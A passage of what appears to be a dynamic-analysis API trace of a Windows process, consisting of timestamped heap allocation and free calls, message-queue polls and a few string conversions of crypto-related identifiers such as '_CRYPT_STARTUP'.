1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0131.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0131.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0131.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0131.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0131.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0131.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0131.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0131.549] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0131.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0131.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0131.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0131.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0131.550] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0131.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0131.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0131.551] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0131.551] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0131.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0131.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0131.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0131.553] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.553] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0131.553] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.553] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.553] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0131.555] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0131.555] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0131.555] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925e0 [0131.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0131.556] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0131.556] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.556] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0131.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0131.556] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0131.556] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0131.556] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0131.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) 